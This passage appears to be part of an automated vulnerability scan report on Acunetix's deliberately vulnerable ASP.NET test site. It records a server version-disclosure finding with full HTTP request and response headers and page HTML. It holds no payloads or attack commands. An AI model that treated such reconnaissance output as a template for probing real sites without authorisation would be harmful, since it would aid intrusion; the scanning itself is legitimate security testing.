href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2
Method	GET
Parameter
Attack
Evidence	2.0.50727
Show / hide Request and Response
Request Header - size: 350 bytes.	GET http://testaspnet.vulnweb.com/ReadNews.aspx?NewsAd=ads/def.html&id=2 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testaspnet.vulnweb.com Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 0 bytes.
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:15 GMT Content-Length: 30606
Response Body - size: 30,606 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?NewsAd=ads%2fdef.html&id=2" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc+YWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNToyMiBBTWQCBQ8WAh8BBTxXZWIgYXR0YWNrcyAtIGNhbiB5b3VyIHdlYiBhcHBsaWNhdGlvbnMgd2l0aHN0YW5kIHRoZSBmb3JjZT9kAgcPFgIfAQWbODxwPjxzdHJvbmc+QWN1bmV0aXggY29tYmF0cyByaXNlIGluIHdlYiBhdHRhY2tzIHdpdGggQWN1bmV0aXggICAgICAgICAgICAgICAgICAgICAgICAgICAgV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAyIDwvc3Ryb25nPjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD4yMSBKdWx5IDIwMDUgLSA8c3Ryb25nPlN0YXJ0LXVwIGNvbXBhbnkgQWN1bmV0aXggcmVsZWFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lcjogYSB0b29sIHRvIGF1dG9tYXRpY2FsbHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXVkaXQgd2Vic2l0ZSBzZWN1cml0eS4gQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciAgICAgICAgICAgICAgICAgICAgICAgICAgICAyIGNyYXdscyBhbiBlbnRpcmUgd2Vic2l0ZSwgbGF1bmNoZXMgcG9wdWxhciB3ZWIgYXR0YWNrcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAoU1FMIEluamVjdGlvbiBldGMuKSBhbmQgaWRlbnRpZmllcyB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBuZWVkIHRvIGJlIGZpeGVkLjwvc3Ryb25nPiA8L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5TZWN1cmluZyB5b3VyIHdlYnNpdGUgc2hvdWxkIGJlIHlvdXIgbnVtYmVyIG9uZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjb25jZXJuPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgSGFja2VycyBhcmUgY29uY2VudHJhdGluZyB0aGVpciBlZmZvcnRzIG9uIHdlYi1iYXNlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBhcHBsaWNhdGlvbnMgLSA3NSUgb2YgY3liZXIgYXR0YWNrcyBhcmUgZG9uZSBhdCB0aGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGxldmVsLCBhIEdhcnRuZXIgR3JvdXAgc3R1ZHkgaGFzIHJldmVhbGVkLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBXZWIgYXBwbGljYXRpb25zIGFyZSBhY2Nlc3NpYmxlIDI0IGhvdXJzIGEgZGF5LCA3IGRheXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgYSB3ZWVrIGFuZCBjb250cm9sIHZhbHVhYmxlIGRhdGEgc3VjaCBhcyBjdXN0b21lciBpbmZvcm1hdGlvbiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHJhbnNhY3Rpb24gaW5mb3JtYXRpb24gYW5kIGV2ZW4gcHJvcHJpZXRhcnkgY29ycG9yYXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGEuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+NTAwLDAwMCBjdXN0b21lciBjcmVkaXQgY2FyZCBudW1iZXJzIG9idGFpbmVkIHZpYSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhIHdlYiBhdHRhY2s8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBXZWxsLWtub3duIHNpdGVzIHRoYXQgd2VyZSBvcGVuIHRvIHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGluY2x1ZGUgZmFzaGlvbiBsYWJlbCBHdWVzcyBhbmQgcGV0IHN1cHBseSByZXRhaWxlciAgICAgICAgICAgICAgICAgICAgICAgICAgICBQZXRDby5jb20gd2hvIHdlcmUgbm90b3Jpb3VzbHkgZm91bmQgdG8gYmUgdnVsbmVyYWJsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB0byB0aGUgU1FMIGluamVjdGlvbiB2dWxuZXJhYmlsaXR5IChKdW5lIDIwMDMpLiBUaGlzICAgICAgICAgICAgICAgICAgICAgICAgICAgIHJlc3VsdGVkIGluIFBldENvIGxlYXZpbmcgYXMgbWFueSBhcyA1MDAsMDAwIGNyZWRpdCAgICAgICAgICAgICAgICAgICAgICAgICAgICBjYXJkIG51bWJlcnMgb3BlbiB0byBhbnlvbmUgYWJsZSB0byBjb25zdHJ1Y3QgdGhpcyBzcGVjaWFsbHktY3JhZnRlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBVUkwuPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc+RmlyZXdhbGxzLCBTU0wgYW5kIGxvY2tlZC1kb3duIHNlcnZlcnMgYXJlIGZ1dGlsZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBoYWNraW5nPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQW55IGRlZmVuc2UgYXQgbmV0d29yayBzZWN1cml0eSBsZXZlbCB3aWxsIHByb3ZpZGUgbm8gICAgICAgICAgICAgICAgICAgICAgICAgICAgcHJvdGVjdGlvbiBhZ2FpbnN0IHdlYiBhcHBsaWNhdGlvbiBhdHRhY2tzIHNpbmNlIHRoZXkgICAgICAgICAgICAgICAgICAgICAgICAgICAgYXJlIGxhdW5jaGVkIG9uIHBvcnQgODAgLSB3aGljaCBoYXMgdG8gcmVtYWluIG9wZW4uICAgICAgICAgICAgICAgICAgICAgICAgICAgIEluIGFkZGl0aW9uLCB3ZWIgYXBwbGljYXRpb25zIChjdXN0b21lciBhcmVhcywgc2hvcHBpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FydHMgZXRjLikgYXJlIG9mdGVuIHRhaWxvci1tYWRlLCBpbnZhcmlhYmx5IHRlc3RlZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZXNzIHRoYW4gb2ZmLXRoZS1zaGVsZiBzb2Z0d2FyZSBhbmQgYXJlIHRoZXJlZm9yZSBtb3JlICAgICAgICAgICAgICAgICAgICAgICAgICAgIHN1c2NlcHRpYmxlIHRvIGF0dGFjay48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+JnF1b3Q7Q29tcGFuaWVzIGhhdmUgaW1wbGVtZW50ZWQgbmV0d29yay1sZXZlbCBzZWN1cml0eSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaG93ZXZlciB0aGV5IGZhaWwgdG8gYXVkaXQgYW5kIHNlY3VyZSB0aGVpciB3ZWIgYXBwbGljYXRpb25zLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBUaGVzZSBhcHBsaWNhdGlvbnMgaGF2ZSBhY2Nlc3MgdG8gc2Vuc2l0aXZlIGRhdGEgYW5kICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFyZSBhIGhhY2tlcidzIHByaW1lIHRhcmdldCwmcXVvdDsgc2FpZCBOaWNrIEdhbGVhLCAgICAgICAgICAgICAgICAgICAgICAgICAgICBDRU8gb2YgQWN1bmV0aXguICZxdW90O0F1ZGl0aW5nIG9uZSdzIHdlYiBhcHBzIHNob3VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICBiZSB0aGUgbnVtYmVyIG9uZSBzZWN1cml0eSBjb25jZXJuLiZxdW90OzwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlRoZSBuZWVkIGZvciBhbiBhdXRvbWF0ZWQgd2ViIGFwcGxpY2F0aW9uIHZ1bG5lcmFiaWxpdHkgICAgICAgICAgICAgICAgICAgICAgICAgICAgc2Nhbm5lcjwvc3Ryb25nPjxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIE1hbnVhbGx5IGF1ZGl0aW5nIGEgd2ViIGFwcGxpY2F0aW9uIGZvciB2dWxuZXJhYmlsaXRpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgdG8gU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiAgICAgICAgICAgICAgICAgICAgICAgICAgICBhdHRhY2tzIGlzIHZpcnR1YWxseSBpbXBvc3NpYmxlLiBXaXRoIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5ICAgICAgICAgICAgICAgICAgICAgICAgICAgIFNjYW5uZXIgdGhlIHByb2Nlc3Mgb2YgYXVkaXRpbmcgd2ViIGFwcGxpY2F0aW9ucyBzdWNoICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFzIHNob3BwaW5nIGNhcnRzIGFuZCBmb3JtcywgY2FuIGJlIGVhc2lseSBhdXRvbWF0ZWQuICAgICAgICAgICAgICAgICAgICAgICAgICAgIFdoYXQncyBtb3JlLCB0aGUgc2VjdXJpdHkgY2hlY2tzIGNhbiBlYXNpbHkgYmUgcmUtbGF1bmNoZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGVhY2ggYXBwbGljYXRpb24gdXBkYXRlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkhvdyBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIHdvcmtzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGZpcnN0IGNyYXdscyB0aGUgd2hvbGUgd2Vic2l0ZSwgYW5hbHl6ZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW4tZGVwdGggZWFjaCBmaWxlIGl0IGZpbmRzLCBhbmQgZGlzcGxheXMgdGhlIGVudGlyZSAgICAgICAgICAgICAgICAgICAgICAgICAgICB3ZWJzaXRlIHN0cnVjdHVyZS4gQWZ0ZXIgdGhpcyBkaXNjb3Zlcnkgc3RhZ2UsIGl0IHBlcmZvcm1zICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFuIGF1dG9tYXRpYyBhdWRpdCBmb3IgY29tbW9uIHNlY3VyaXR5IHZ1bG5lcmFiaWxpdGllcy48L3A+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BdXRvbWF0aWNhbGx5IGRldGVjdHMgU1FMIGluamVjdGlvbiwgY3Jvc3Mgc2l0ZSAgICAgICAgICAgICAgICAgICAgICAgICAgICBzY3JpcHRpbmcgYW5kIG90aGVyIHdlYiB2dWxuZXJhYmlsaXRpZXM8L3N0cm9uZz48YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICBTUUwgaW5qZWN0aW9uIGlzIGEgaGFja2luZyB0ZWNobmlxdWUgd2hpY2ggbW9kaWZpZXMgICAgICAgICAgICAgICAgICAgICAgICAgICAgU1FMIGNvbW1hbmRzIGluIG9yZGVyIHRvIGdhaW4gYWNjZXNzIHRvIGRhdGEgaW4gdGhlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGRhdGFiYXNlLiBDcm9zcyBzaXRlIHNjcmlwdGluZyBhdHRhY2tzIGFsbG93IGEgaGFja2VyICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRvIGV4ZWN1dGUgYSBtYWxpY2lvdXMgc2NyaXB0IG9uIHlvdXIgdmlzaXRvcnMnIGJyb3dzZXIuICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgY2FuIGNoZWNrIGlmIHlvdXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgd2ViIGFwcGxpY2F0aW9uIGlzIHZ1bG5lcmFibGUgdG8gYm90aCBvZiB0aGVzZSBhdHRhY2tzLiAgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYCHgtOYXZpZ2F0ZVVybAUSQ29tbWVudHMuYXNweD9pZD0yZGQCCw8WAh4Dc3JjBQxhZHMvZGVmLmh0bWxkZCqQXr9Bo+fii5vVAAhGyfGRVNk1" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLjj6S6DAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBJXwOObHp1dq30nemUavTDCszjxx" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> 